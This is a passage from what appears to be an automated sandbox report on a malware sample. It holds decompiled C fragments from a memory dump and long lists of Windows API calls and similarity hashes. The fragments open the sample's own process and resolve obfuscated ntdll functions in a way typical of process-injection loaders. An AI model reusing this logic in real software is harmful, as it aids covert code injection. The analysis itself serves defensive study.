                                                                                                                                  				void* _t2;
                                                                                                                                  				unsigned int _t4;
                                                                                                                                  				void* _t5;
                                                                                                                                  				long _t6;
                                                                                                                                  				void* _t7;
                                                                                                                                  				void* _t15;
                                                                                                                                  
                                                                                                                                  				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                  				 *0xa3d2a4 = _t2;
                                                                                                                                  				if(_t2 == 0) {
                                                                                                                                  					return GetLastError();
                                                                                                                                  				}
                                                                                                                                  				_t4 = GetVersion();
                                                                                                                                  				if(_t4 != 5) {
                                                                                                                                  					L4:
                                                                                                                                  					if(_t15 <= 0) {
                                                                                                                                  						_t5 = 0x32;
                                                                                                                                  						return _t5;
                                                                                                                                  					}
                                                                                                                                  					L5:
                                                                                                                                  					 *0xa3d294 = _t4;
                                                                                                                                  					_t6 = GetCurrentProcessId();
                                                                                                                                  					 *0xa3d290 = _t6;
                                                                                                                                  					 *0xa3d29c = _a4;
                                                                                                                                  					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                  					 *0xa3d28c = _t7;
                                                                                                                                  					if(_t7 == 0) {
                                                                                                                                  						 *0xa3d28c =  *0xa3d28c | 0xffffffff;
                                                                                                                                  					}
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				if(_t4 >> 8 > 0) {
                                                                                                                                  					goto L5;
                                                                                                                                  				}
                                                                                                                                  				_t15 = _t4 - _t4;
                                                                                                                                  				goto L4;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00A32669,?,?,00000001,?,?,?,00A31900,?), ref: 00A31A2C
                                                                                                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,00A31900,?), ref: 00A31A3B
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00A31900,?), ref: 00A31A57
                                                                                                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00A31900,?), ref: 00A31A74
                                                                                                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,00A31900,?), ref: 00A31A93
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 2270775618-3251738875
                                                                                                                                  • Opcode ID: 9ecf881ed83c2e3829bfce2845d6ecdb77b76d82afd00ab64748e8c990165549
                                                                                                                                  • Instruction ID: 82b7abb5693845ef8aae05448b5c434d259b6051908397c93f305545d71b8f00
                                                                                                                                  • Opcode Fuzzy Hash: 9ecf881ed83c2e3829bfce2845d6ecdb77b76d82afd00ab64748e8c990165549
                                                                                                                                  • Instruction Fuzzy Hash: ECF0AF70A46302EBD724CBF4AD0A76A3BA4E7057A2F104519F546DA1E0E770C443DF15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00A31AF6
                                                                                                                                  • SysAllocString.OLEAUT32(0070006F), ref: 00A31B0A
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00A31B1C
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A31B84
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A31B93
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A31B9E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 344208780-0
                                                                                                                                  • Opcode ID: 52b07f76413980d28cefa56e4885abc06a664514c4928d872a44fdad2a7c5a0a
                                                                                                                                  • Instruction ID: 7f56a610fb085ffb270d019d048cda6f857908c3dc41c71d0dac1bfd189af9c4
                                                                                                                                  • Opcode Fuzzy Hash: 52b07f76413980d28cefa56e4885abc06a664514c4928d872a44fdad2a7c5a0a
                                                                                                                                  • Instruction Fuzzy Hash: FE415D36900609AFDB01DFF8DC45AAEB7B9EF89310F144466F910EB220EA719D06CB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A34837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _t23;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				_Unknown_base(*)()* _t28;
                                                                                                                                  				intOrPtr _t30;
                                                                                                                                  				_Unknown_base(*)()* _t32;
                                                                                                                                  				intOrPtr _t33;
                                                                                                                                  				_Unknown_base(*)()* _t35;
                                                                                                                                  				intOrPtr _t36;
                                                                                                                                  				_Unknown_base(*)()* _t38;
                                                                                                                                  				intOrPtr _t39;
                                                                                                                                  				_Unknown_base(*)()* _t41;
                                                                                                                                  				intOrPtr _t44;
                                                                                                                                  				struct HINSTANCE__* _t48;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  
                                                                                                                                  				_t54 = E00A375F6(0x20);
                                                                                                                                  				if(_t54 == 0) {
                                                                                                                                  					_v8 = 8;
                                                                                                                                  				} else {
                                                                                                                                  					_t23 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  					_t1 = _t23 + 0xa3e11a; // 0x4c44544e
                                                                                                                                  					_t48 = GetModuleHandleA(_t1);
                                                                                                                                  					_t26 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  					_t2 = _t26 + 0xa3e782; // 0x7243775a
                                                                                                                                  					_v8 = 0x7f;
                                                                                                                                  					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                  					 *(_t54 + 0xc) = _t28;
                                                                                                                                  					if(_t28 == 0) {
                                                                                                                                  						L8:
                                                                                                                                  						E00A34AAB(_t54);
                                                                                                                                  					} else {
                                                                                                                                  						_t30 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  						_t5 = _t30 + 0xa3e76f; // 0x614d775a
                                                                                                                                  						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                  						 *(_t54 + 0x10) = _t32;
                                                                                                                                  						if(_t32 == 0) {
                                                                                                                                  							goto L8;
                                                                                                                                  						} else {
                                                                                                                                  							_t33 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  							_t7 = _t33 + 0xa3e4ce; // 0x6e55775a
                                                                                                                                  							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                  							 *(_t54 + 0x14) = _t35;
                                                                                                                                  							if(_t35 == 0) {
                                                                                                                                  								goto L8;
                                                                                                                                  							} else {
                                                                                                                                  								_t36 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  								_t9 = _t36 + 0xa3e406; // 0x4e6c7452
                                                                                                                                  								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                  								 *(_t54 + 0x18) = _t38;
                                                                                                                                  								if(_t38 == 0) {
                                                                                                                                  									goto L8;
                                                                                                                                  								} else {
                                                                                                                                  									_t39 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  									_t11 = _t39 + 0xa3e792; // 0x6c43775a
                                                                                                                                  									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                  									 *(_t54 + 0x1c) = _t41;
                                                                                                                                  									if(_t41 == 0) {
                                                                                                                                  										goto L8;
                                                                                                                                  									} else {
                                                                                                                                  										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                  										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                  										_t44 = E00A39269(_t54, _a8);
                                                                                                                                  										_v8 = _t44;
                                                                                                                                  										if(_t44 != 0) {
                                                                                                                                  											goto L8;
                                                                                                                                  										} else {
                                                                                                                                  											 *_a12 = _t54;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _v8;
                                                                                                                                  			}



















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00A3101C,?,00000001,?,?,00000000,00000000), ref: 00A3485C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A3487E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A34894
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A348AA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A348C0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A348D6
                                                                                                                                    • Part of subcall function 00A39269: memset.NTDLL ref: 00A392E8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1886625739-0
                                                                                                                                  • Opcode ID: 80d105d6e148723b786a60187b9fa9300f6715ef927240a101bc1a21556f0cb6
                                                                                                                                  • Instruction ID: 072f51056e8eb1af60bc99aaceaf7292b521807b9bbca13324a57ca08abe41af
                                                                                                                                  • Opcode Fuzzy Hash: 80d105d6e148723b786a60187b9fa9300f6715ef927240a101bc1a21556f0cb6
                                                                                                                                  • Instruction Fuzzy Hash: 0621F7B150064AEFEB20DFA9DD44EABBBECEF18344B014466F545C7251E774EA06CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 6E8FE172
                                                                                                                                  • _Maklocstr.LIBCPMT ref: 6E8FE1DB
                                                                                                                                  • _Maklocstr.LIBCPMT ref: 6E8FE1ED
                                                                                                                                  • _Maklocchr.LIBCPMT ref: 6E8FE205
                                                                                                                                  • _Maklocchr.LIBCPMT ref: 6E8FE215
                                                                                                                                  • _Getvals.LIBCPMT ref: 6E8FE237
                                                                                                                                    • Part of subcall function 6E8F688C: _Maklocchr.LIBCPMT ref: 6E8F68BB
                                                                                                                                    • Part of subcall function 6E8F688C: _Maklocchr.LIBCPMT ref: 6E8F68D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3549167292-0
                                                                                                                                  • Opcode ID: 8600820448067cb0dd03198f472609bb8880dff0a8404b35a4a2e98b30a60a6a
                                                                                                                                  • Instruction ID: feea8bc94a24eab6035c6be7887af6534faf9f5e9c750b764e7b2cb37d91e825
                                                                                                                                  • Opcode Fuzzy Hash: 8600820448067cb0dd03198f472609bb8880dff0a8404b35a4a2e98b30a60a6a
                                                                                                                                  • Instruction Fuzzy Hash: 62216D71C00318EBDF149FE9D844ACE7BACAF04394F00895AB9149F281EB70D641CBE1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F74EB
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F74F5
                                                                                                                                  • int.LIBCPMT ref: 6E8F750C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7546
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7566
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7573
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1C08
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1C12
                                                                                                                                  • int.LIBCPMT ref: 6E8F1C29
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1C63
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1C83
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1C90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E905434
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E90543E
                                                                                                                                  • int.LIBCPMT ref: 6E905455
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E90548F
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E9054AF
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E9054BC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7456
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7460
                                                                                                                                  • int.LIBCPMT ref: 6E8F7477
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F74B1
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F74D1
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F74DE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7C7C
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7C86
                                                                                                                                  • int.LIBCPMT ref: 6E8F7C9D
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7CD7
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7CF7
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7D04
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E9055F3
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9055FD
                                                                                                                                  • int.LIBCPMT ref: 6E905614
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E90564E
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E90566E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E90567B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7D11
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7D1B
                                                                                                                                  • int.LIBCPMT ref: 6E8F7D32
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7D6C
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7D8C
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7D99
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7580
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F758A
                                                                                                                                  • int.LIBCPMT ref: 6E8F75A1
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F75DB
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F75FB
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7608
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7A28
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7A32
                                                                                                                                  • int.LIBCPMT ref: 6E8F7A49
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7A83
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7AA3
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7AB0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90539F
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9053A9
                                                                                                                                  • int.LIBCPMT ref: 6E9053C0
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9053FA
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E90541A
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905427
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F73C1
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F73CB
                                                                                                                                  • int.LIBCPMT ref: 6E8F73E2
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F741C
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F743C
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7449
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7BE7
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7BF1
                                                                                                                                  • int.LIBCPMT ref: 6E8F7C08
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7C42
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7C62
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7C6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1B73
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1B7D
                                                                                                                                  • int.LIBCPMT ref: 6E8F1B94
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1BCE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1BEE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1BFB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F78FE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7908
                                                                                                                                  • int.LIBCPMT ref: 6E8F791F
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7959
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7979
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7986
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7869
